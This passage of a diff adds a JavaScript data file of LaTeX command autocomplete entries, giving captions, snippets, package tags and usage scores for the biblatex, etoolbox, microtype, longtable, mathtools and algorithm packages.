'\\newboolean{$1}', + meta: 'algorithm-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'algorithm-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'algorithm-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\listof{}{}', + snippet: '\\listof{$1}{$2}', + meta: 'algorithm-cmd', + score: 0.0009837365348002915, + }, + { + caption: '\\floatplacement{}{}', + snippet: '\\floatplacement{$1}{$2}', + meta: 'algorithm-cmd', + score: 0.0005815474978918903, + }, + { + caption: '\\restylefloat{}', + snippet: '\\restylefloat{$1}', + meta: 'algorithm-cmd', + score: 0.0008866338267686714, + }, + { + caption: '\\floatstyle{}', + snippet: '\\floatstyle{$1}', + meta: 'algorithm-cmd', + score: 0.0015470917047414941, + }, + { + caption: '\\floatname{}{}', + snippet: '\\floatname{$1}{$2}', + meta: 'algorithm-cmd', + score: 0.0011934321931750752, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'algorithm-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'algorithm-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\newfloat{}{}{}', + snippet: '\\newfloat{$1}{$2}{$3}', + meta: 'algorithm-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat', + snippet: '\\newfloat', + meta: 'algorithm-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat{}', + snippet: '\\newfloat{$1}', + meta: 'algorithm-cmd', + score: 0.0012745874472536625, + }, + ], + biblatex: [ + { + caption: '\\textcite{}', + snippet: '\\textcite{$1}', + meta: 'biblatex-cmd', + score: 0.0071363824748767206, + }, + { + caption: '\\iffieldundef{}{}{}', + snippet: '\\iffieldundef{$1}{$2}{$3}', + meta: 'biblatex-cmd', + score: 4.841482597532878e-5, + }, + { + caption: '\\list{}{}', + snippet: '\\list{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.00046570666700199663, + }, + { + caption: '\\list{}', + snippet: '\\list{$1}', + meta: 'biblatex-cmd', + score: 0.00046570666700199663, + }, + { + caption: '\\list', + snippet: '\\list', + meta: 'biblatex-cmd', + score: 0.00046570666700199663, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'biblatex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'biblatex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\printbibliography', + snippet: '\\printbibliography', + meta: 'biblatex-cmd', + score: 0.028923378512954446, + }, + { + caption: '\\printbibliography[]', + snippet: '\\printbibliography[$1]', + meta: 'biblatex-cmd', + score: 0.028923378512954446, + }, + { + caption: '\\keyword{}', + snippet: '\\keyword{$1}', + meta: 'biblatex-cmd', + score: 0.0056978719547823445, + }, + { + caption: '\\nocite{}', + snippet: '\\nocite{$1}', + meta: 'biblatex-cmd', + score: 0.04990693820960752, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'biblatex-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\mkbibquote{}', + snippet: '\\mkbibquote{$1}', + meta: 'biblatex-cmd', + score: 4.841482597532878e-5, + }, + { + caption: '\\addabbrvspace', + snippet: '\\addabbrvspace', + meta: 'biblatex-cmd', + score: 4.841482597532878e-5, + }, + { + caption: '\\AtEveryBibitem{}', + snippet: '\\AtEveryBibitem{$1}', + meta: 'biblatex-cmd', + score: 0.0006862523808353773, + }, + { + caption: '\\mkbibemph{}', + snippet: '\\mkbibemph{$1}', + meta: 'biblatex-cmd', + score: 4.841482597532878e-5, + }, + { + caption: '\\DeclareFieldFormat{}{}', + snippet: '\\DeclareFieldFormat{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.00028207109055618685, + }, + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'biblatex-cmd', + score: 0.2659628337907604, + }, + { + caption: '\\enquote{}', + snippet: '\\enquote{$1}', + meta: 'biblatex-cmd', + score: 0.0077432730806830915, + }, + { + caption: '\\bibopenbracket', + snippet: '\\bibopenbracket', + meta: 'biblatex-cmd', + score: 0.0005125772067631753, + }, + { + caption: '\\newbibmacro{}[]{}', + snippet: '\\newbibmacro{$1}[$2]{$3}', + meta: 'biblatex-cmd', + score: 4.841482597532878e-5, + }, + { + caption: '\\addbibresource{}', + snippet: '\\addbibresource{$1}', + meta: 'biblatex-cmd', + score: 0.033545778388159704, + }, + { + caption: '\\defbibheading{}{}', + snippet: '\\defbibheading{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.00013423526504458629, + }, + { + caption: '\\DeclareNameAlias{}{}', + snippet: '\\DeclareNameAlias{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.0003596306478652252, + }, + { + caption: '\\bibcloseparen', + snippet: '\\bibcloseparen', + meta: 'biblatex-cmd', + score: 0.0005125772067631753, + }, + { + caption: '\\renewbibmacro{}{}', + snippet: '\\renewbibmacro{$1}{$2}', + meta: 'biblatex-cmd', + score: 9.70299207241043e-5, + }, + { + caption: '\\bibclosebracket', + snippet: '\\bibclosebracket', + meta: 'biblatex-cmd', + score: 0.0005125772067631753, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'biblatex-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'biblatex-cmd', + score: 3.800886892251021, + }, + { + caption: '\\parentext', + snippet: '\\parentext', + meta: 'biblatex-cmd', + score: 0.0005125772067631753, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'biblatex-cmd', + score: 2.341195220791228, + }, + { + caption: '\\addspace', + snippet: '\\addspace', + meta: 'biblatex-cmd', + score: 0.0002657609533376918, + }, + { + caption: '\\ifentrytype{}{}{}', + snippet: '\\ifentrytype{$1}{$2}{$3}', + meta: 'biblatex-cmd', + score: 8.342875497183237e-5, + }, + { + caption: '\\addslash', + snippet: '\\addslash', + meta: 'biblatex-cmd', + score: 0.0002657609533376918, + }, + { + caption: '\\DefineBibliographyStrings{}{}', + snippet: '\\DefineBibliographyStrings{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.001537977148659816, + }, + { + caption: '\\section{}', + snippet: '\\section{$1}', + meta: 'biblatex-cmd', + score: 3.0952612541683835, + }, + { + caption: '\\newblockpunct', + snippet: '\\newblockpunct', + meta: 'biblatex-cmd', + score: 0.0001328804766688459, + }, + { + caption: '\\defbibfilter{}{}', + snippet: '\\defbibfilter{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.0005203319717980072, + }, + { + caption: '\\parencite{}', + snippet: '\\parencite{$1}', + meta: 'biblatex-cmd', + score: 0.0447747090014577, + }, + { + caption: '\\parencite[]{}', + snippet: '\\parencite[$1]{$2}', + meta: 'biblatex-cmd', + score: 0.0447747090014577, + }, + { + caption: '\\midsentence', + snippet: '\\midsentence', + meta: 'biblatex-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\nolinkurl{}', + snippet: '\\nolinkurl{$1}', + meta: 'biblatex-cmd', + score: 0.0004995635515943437, + }, + { + caption: '\\DeclareSourcemap{}', + snippet: '\\DeclareSourcemap{$1}', + meta: 'biblatex-cmd', + score: 0.0005203319717980072, + }, + { + caption: '\\AtBeginBibliography{}', + snippet: '\\AtBeginBibliography{$1}', + meta: 'biblatex-cmd', + score: 0.0004668773504581073, + }, + { + caption: '\\AtEveryCite{}', + snippet: '\\AtEveryCite{$1}', + meta: 'biblatex-cmd', + score: 0.0005125772067631753, + }, + { + caption: '\\DeclareLanguageMapping{}{}', + snippet: '\\DeclareLanguageMapping{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.000703956971675325, + }, + { + caption: '\\addtocategory{}{}', + snippet: '\\addtocategory{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.008238589553468446, + }, + { + caption: '\\DeclareBibliographyCategory{}', + snippet: '\\DeclareBibliographyCategory{$1}', + meta: 'biblatex-cmd', + score: 0.0010298236941835557, + }, + { + caption: '\\break', + snippet: '\\break', + meta: 'biblatex-cmd', + score: 0.016352452390960115, + }, + { + caption: '\\break{}', + snippet: '\\break{$1}', + meta: 'biblatex-cmd', + score: 0.016352452390960115, + }, + { + caption: '\\break{}{}', + snippet: '\\break{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.016352452390960115, + }, + { + caption: '\\bibopenparen', + snippet: '\\bibopenparen', + meta: 'biblatex-cmd', + score: 0.0005125772067631753, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'biblatex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\name{}{}', + snippet: '\\name{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.1236289144754329, + }, + { + caption: '\\name', + snippet: '\\name', + meta: 'biblatex-cmd', + score: 0.1236289144754329, + }, + { + caption: '\\name{}', + snippet: '\\name{$1}', + meta: 'biblatex-cmd', + score: 0.1236289144754329, + }, + { + caption: '\\ExecuteBibliographyOptions{}', + snippet: '\\ExecuteBibliographyOptions{$1}', + meta: 'biblatex-cmd', + score: 4.841482597532878e-5, + }, + { + caption: '\\usebibmacro{}{}', + snippet: '\\usebibmacro{$1}{$2}', + meta: 'biblatex-cmd', + score: 9.682965195065755e-5, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'biblatex-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'biblatex-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'biblatex-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'biblatex-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'biblatex-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'biblatex-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'biblatex-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'biblatex-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'biblatex-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'biblatex-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'biblatex-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'biblatex-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'biblatex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'biblatex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'biblatex-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'biblatex-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'biblatex-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'biblatex-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'biblatex-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'biblatex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'biblatex-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'biblatex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'biblatex-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'biblatex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'biblatex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'biblatex-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'biblatex-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'biblatex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'biblatex-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'biblatex-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'biblatex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'biblatex-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'biblatex-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'biblatex-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'biblatex-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'biblatex-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'biblatex-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'biblatex-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'biblatex-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'biblatex-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'biblatex-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'biblatex-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'biblatex-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'biblatex-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'biblatex-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'biblatex-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'biblatex-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'biblatex-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'biblatex-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'biblatex-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'biblatex-cmd', + score: 0.008565354665444157, + }, + ], + microtype: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'microtype-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'microtype-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'microtype-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\lsstyle', + snippet: '\\lsstyle', + meta: 'microtype-cmd', + score: 0.0023367519914345774, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'microtype-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\DisableLigatures[]{}', + snippet: '\\DisableLigatures[$1]{$2}', + meta: 'microtype-cmd', + score: 0.0009805246614299932, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'microtype-cmd', + score: 0.00037306820619479756, + }, + ], + etoolbox: [ + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'etoolbox-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'etoolbox-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'etoolbox-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'etoolbox-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'etoolbox-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'etoolbox-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'etoolbox-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'etoolbox-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'etoolbox-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'etoolbox-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'etoolbox-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'etoolbox-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'etoolbox-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'etoolbox-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'etoolbox-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'etoolbox-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'etoolbox-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'etoolbox-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'etoolbox-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'etoolbox-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'etoolbox-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'etoolbox-cmd', + score: 0.008565354665444157, + }, + ], + longtable: [ + { + caption: '\\endhead', + snippet: '\\endhead', + meta: 'longtable-cmd', + score: 0.0023853501147448834, + }, + { + caption: '\\endfoot', + snippet: '\\endfoot', + meta: 'longtable-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'longtable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'longtable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nopagebreak', + snippet: '\\nopagebreak', + meta: 'longtable-cmd', + score: 9.952664522415981e-5, + }, + { + caption: '\\endfirsthead', + snippet: '\\endfirsthead', + meta: 'longtable-cmd', + score: 0.0016148498709822416, + }, + { + caption: '\\endlastfoot', + snippet: '\\endlastfoot', + meta: 'longtable-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'longtable-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'longtable-cmd', + score: 0.0029238994233674776, + }, + { + caption: '\\pagebreak', + snippet: '\\pagebreak', + meta: 'longtable-cmd', + score: 0.0313525090421608, + }, + ], + mathtools: [ + { + caption: '\\xleftrightarrow[][]{}', + snippet: '\\xleftrightarrow[$1][$2]{$3}', + meta: 'mathtools-cmd', + score: 4.015559489911509e-5, + }, + { + caption: '\\vcentcolon', + snippet: '\\vcentcolon', + meta: 'mathtools-cmd', + score: 0.00021361943526711615, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'mathtools-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\coloneqq', + snippet: '\\coloneqq', + meta: 'mathtools-cmd', + score: 0.0014407293323958122, + }, + { + caption: '\\mathclap{}', + snippet: '\\mathclap{$1}', + meta: 'mathtools-cmd', + score: 7.84378567451772e-5, + }, + { + caption: '\\adjustlimits', + snippet: '\\adjustlimits', + meta: 'mathtools-cmd', + score: 0.0005307066890271085, + }, + { + caption: '\\MoveEqLeft', + snippet: '\\MoveEqLeft', + meta: 'mathtools-cmd', + score: 5.343949980628182e-5, + }, + { + caption: '\\mathrlap{}', + snippet: '\\mathrlap{$1}', + meta: 'mathtools-cmd', + score: 0.0003112817211637952, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'mathtools-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\xhookrightarrow{}', + snippet: '\\xhookrightarrow{$1}', + meta: 'mathtools-cmd', + score: 5.444260823474129e-5, + }, + { + caption: '\\DeclarePairedDelimiter{}{}{}', + snippet: '\\DeclarePairedDelimiter{$1}{$2}{$3}', + meta: 'mathtools-cmd', + score: 0.0033916678416372487, + }, + { + caption: '\\DeclarePairedDelimiter', + snippet: '\\DeclarePairedDelimiter', + meta: 'mathtools-cmd', + score: 0.0033916678416372487, + }, + { + caption: '\\prescript{}{}{}', + snippet: '\\prescript{$1}{$2}{$3}', + meta: 'mathtools-cmd', + score: 8.833369785705982e-6, + }, + { + caption: '\\underbrace{}', + snippet: '\\underbrace{$1}', + meta: 'mathtools-cmd', + score: 0.010373780436850907, + }, + { + caption: '\\mathllap{}', + snippet: '\\mathllap{$1}', + meta: 'mathtools-cmd', + score: 3.140504277052775e-5, + }, + { + caption: '\\overbrace{}', + snippet: '\\overbrace{$1}', + meta: 'mathtools-cmd', + score: 0.0006045704778718376, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'mathtools-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'mathtools-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'mathtools-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'mathtools-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mathtools-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mathtools-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'mathtools-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'mathtools-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mathtools-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mathtools-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'mathtools-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mathtools-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'mathtools-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'mathtools-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'mathtools-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'mathtools-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'mathtools-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'mathtools-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'mathtools-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'mathtools-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'mathtools-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'mathtools-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'mathtools-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'mathtools-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'mathtools-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'mathtools-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'mathtools-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'mathtools-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'mathtools-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'mathtools-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'mathtools-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'mathtools-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'mathtools-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'mathtools-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 